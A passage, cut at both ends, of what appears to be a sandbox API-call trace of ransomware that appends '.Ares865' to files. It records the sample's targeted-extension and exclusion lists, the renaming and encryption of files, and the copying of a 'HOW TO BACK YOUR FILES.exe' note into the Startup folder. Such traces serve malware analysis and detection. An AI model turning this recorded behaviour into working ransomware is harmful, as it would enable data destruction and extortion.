lpString2="trc") returned -1 [0058.083] lstrlenW (lpString="trm") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.083] lstrlenW (lpString="udb") returned 3 [0058.083] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.083] lstrlenW (lpString="udl") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.084] lstrlenW (lpString="usr") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.084] lstrlenW (lpString="v12") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.084] lstrlenW (lpString="vis") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.084] lstrlenW (lpString="vpd") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.084] lstrlenW (lpString="vvv") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.084] lstrlenW (lpString="wdb") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.084] lstrlenW (lpString="wmdb") returned 4 [0058.084] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.084] lstrlenW (lpString="wrk") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.084] lstrlenW (lpString="xdb") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.084] lstrlenW (lpString="xld") returned 3 [0058.084] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.084] lstrlenW (lpString="xmlff") returned 5 [0058.084] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0058.084] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer.lnk.Ares865") returned 71 [0058.084] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\internet explorer.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\internet explorer.lnk.ares865"), dwFlags=0x1) returned 1 [0058.085] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\internet explorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.085] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1449) returned 1 [0058.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0058.085] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0058.086] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.086] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.086] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8b0, lpName=0x0) returned 0x154 [0058.087] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b0) returned 0x190000 [0058.088] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0058.089] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.089] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0058.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0058.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.089] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.090] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.090] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.090] CloseHandle (hObject=0x154) returned 1 [0058.090] CloseHandle (hObject=0x15c) returned 1 [0058.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0058.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.091] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2="aoldtz.exe") returned 1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2=".") returned 1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2="..") returned 1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2="windows") returned -1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2="bootmgr") returned 1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2="temp") returned -1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2="pagefile.sys") returned -1 [0058.091] lstrcmpiW (lpString1="Maintenance", lpString2="boot") returned 1 [0058.092] lstrcmpiW (lpString1="Maintenance", lpString2="ids.txt") returned 1 [0058.092] lstrcmpiW (lpString1="Maintenance", lpString2="ntuser.dat") returned -1 [0058.092] lstrcmpiW (lpString1="Maintenance", lpString2="perflogs") returned -1 [0058.092] lstrcmpiW (lpString1="Maintenance", lpString2="MSBuild") returned -1 [0058.092] lstrlenW (lpString="Maintenance") returned 11 [0058.092] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Internet Explorer.lnk") returned 63 [0058.092] lstrcpyW (in: lpString1=0x2cce454, lpString2="Maintenance" | out: lpString1="Maintenance") returned="Maintenance" [0058.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0058.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2d30d0 [0058.092] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23c8 | out: ListHead=0x2e7710, ListEntry=0x2d23c8) returned 0x2d23a8 [0058.092] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="aoldtz.exe") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2=".") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="..") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="windows") returned -1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="bootmgr") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="temp") returned -1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="pagefile.sys") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="boot") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="ids.txt") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="ntuser.dat") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="perflogs") returned 1 [0058.092] lstrcmpiW (lpString1="Startup", lpString2="MSBuild") returned 1 [0058.092] lstrlenW (lpString="Startup") returned 7 [0058.092] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance") returned 53 [0058.092] lstrcpyW (in: lpString1=0x2cce454, lpString2="Startup" | out: lpString1="Startup") returned="Startup" [0058.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0058.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2cc5b0 [0058.092] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23e8 | out: ListHead=0x2e7710, ListEntry=0x2d23e8) returned 0x2d23c8 [0058.092] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 0 [0058.092] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0058.092] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d23e8 [0058.093] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Startup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Startup") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Startup" [0058.093] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0058.093] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0058.093] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Startup") returned 49 [0058.093] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Startup" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Startup") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Startup" [0058.093] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.093] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\startup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.093] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0058.093] GetLastError () returned 0x0 [0058.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.093] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.093] CloseHandle (hObject=0x118) returned 1 [0058.094] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.094] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.094] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.094] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.094] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.094] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.094] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d25ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d25ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.094] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.094] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.094] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.094] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.094] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0058.094] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0058.094] lstrlenW (lpString="desktop.ini") returned 11 [0058.094] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Startup\\*") returned 51 [0058.094] lstrcpyW (in: lpString1=0x2cce464, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0058.094] lstrlenW (lpString="desktop.ini") returned 11 [0058.094] lstrlenW (lpString="Ares865") returned 7 [0058.095] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.095] lstrlenW (lpString=".dll") returned 4 [0058.095] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0058.095] lstrlenW (lpString=".lnk") returned 4 [0058.095] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0058.095] lstrlenW (lpString=".ini") returned 4 [0058.095] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0058.095] lstrlenW (lpString=".sys") returned 4 [0058.095] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0058.095] lstrlenW (lpString="desktop.ini") returned 11 [0058.095] lstrlenW (lpString="bak") returned 3 [0058.095] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.095] lstrlenW (lpString="ba_") returned 3 [0058.095] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.095] lstrlenW (lpString="dbb") returned 3 [0058.095] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.095] lstrlenW (lpString="vmdk") returned 4 [0058.095] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.095] lstrlenW (lpString="rar") returned 3 [0058.095] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.095] lstrlenW (lpString="zip") returned 3 [0058.095] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0058.095] lstrlenW (lpString="tgz") returned 3 [0058.095] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.095] lstrlenW (lpString="vbox") returned 4 [0058.095] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.095] lstrlenW (lpString="vdi") returned 3 [0058.095] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.095] lstrlenW (lpString="vhd") returned 3 [0058.095] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.095] lstrlenW (lpString="vhdx") returned 4 [0058.095] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.095] lstrlenW (lpString="avhd") returned 4 [0058.095] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.095] lstrlenW (lpString="db") returned 2 [0058.095] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.096] lstrlenW (lpString="db2") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.096] lstrlenW (lpString="db3") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.096] lstrlenW (lpString="dbf") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.096] lstrlenW (lpString="mdf") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.096] lstrlenW (lpString="mdb") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.096] lstrlenW (lpString="sql") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.096] lstrlenW (lpString="sqlite") returned 6 [0058.096] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.096] lstrlenW (lpString="sqlite3") returned 7 [0058.096] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.096] lstrlenW (lpString="sqlitedb") returned 8 [0058.096] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.096] lstrlenW (lpString="xml") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.096] lstrlenW (lpString="$er") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.096] lstrlenW (lpString="4dd") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.096] lstrlenW (lpString="4dl") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.096] lstrlenW (lpString="^^^") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.096] lstrlenW (lpString="abs") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.096] lstrlenW (lpString="abx") returned 3 [0058.096] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.096] lstrlenW (lpString="accdb") returned 5 [0058.096] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.096] lstrlenW (lpString="accdc") returned 5 [0058.096] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.096] lstrlenW (lpString="accde") returned 5 [0058.096] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.097] lstrlenW (lpString="accdr") returned 5 [0058.097] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.097] lstrlenW (lpString="accdt") returned 5 [0058.097] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.097] lstrlenW (lpString="accdw") returned 5 [0058.097] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.097] lstrlenW (lpString="accft") returned 5 [0058.097] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.097] lstrlenW (lpString="adb") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.097] lstrlenW (lpString="adb") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.097] lstrlenW (lpString="ade") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.097] lstrlenW (lpString="adf") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.097] lstrlenW (lpString="adn") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.097] lstrlenW (lpString="adp") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.097] lstrlenW (lpString="alf") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.097] lstrlenW (lpString="ask") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.097] lstrlenW (lpString="btr") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.097] lstrlenW (lpString="cat") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.097] lstrlenW (lpString="cdb") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.097] lstrlenW (lpString="ckp") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.097] lstrlenW (lpString="cma") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.097] lstrlenW (lpString="cpd") returned 3 [0058.097] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.097] lstrlenW (lpString="dacpac") returned 6 [0058.097] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.098] lstrlenW (lpString="dad") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.098] lstrlenW (lpString="dadiagrams") returned 10 [0058.098] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.098] lstrlenW (lpString="daschema") returned 8 [0058.098] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.098] lstrlenW (lpString="db-journal") returned 10 [0058.098] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.098] lstrlenW (lpString="db-shm") returned 6 [0058.098] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.098] lstrlenW (lpString="db-wal") returned 6 [0058.098] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.098] lstrlenW (lpString="dbc") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.098] lstrlenW (lpString="dbs") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.098] lstrlenW (lpString="dbt") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.098] lstrlenW (lpString="dbv") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.098] lstrlenW (lpString="dbx") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.098] lstrlenW (lpString="dcb") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.098] lstrlenW (lpString="dct") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.098] lstrlenW (lpString="dcx") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.098] lstrlenW (lpString="ddl") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.098] lstrlenW (lpString="dlis") returned 4 [0058.098] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.098] lstrlenW (lpString="dp1") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.098] lstrlenW (lpString="dqy") returned 3 [0058.098] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.098] lstrlenW (lpString="dsk") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.099] lstrlenW (lpString="dsn") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.099] lstrlenW (lpString="dtsx") returned 4 [0058.099] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.099] lstrlenW (lpString="dxl") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.099] lstrlenW (lpString="eco") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.099] lstrlenW (lpString="ecx") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.099] lstrlenW (lpString="edb") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0058.099] lstrlenW (lpString="epim") returned 4 [0058.099] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.099] lstrlenW (lpString="fcd") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.099] lstrlenW (lpString="fdb") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.099] lstrlenW (lpString="fic") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.099] lstrlenW (lpString="flexolibrary") returned 12 [0058.099] lstrlenW (lpString="fm5") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.099] lstrlenW (lpString="fmp") returned 3 [0058.099] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.099] lstrlenW (lpString="fmp12") returned 5 [0058.099] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.099] 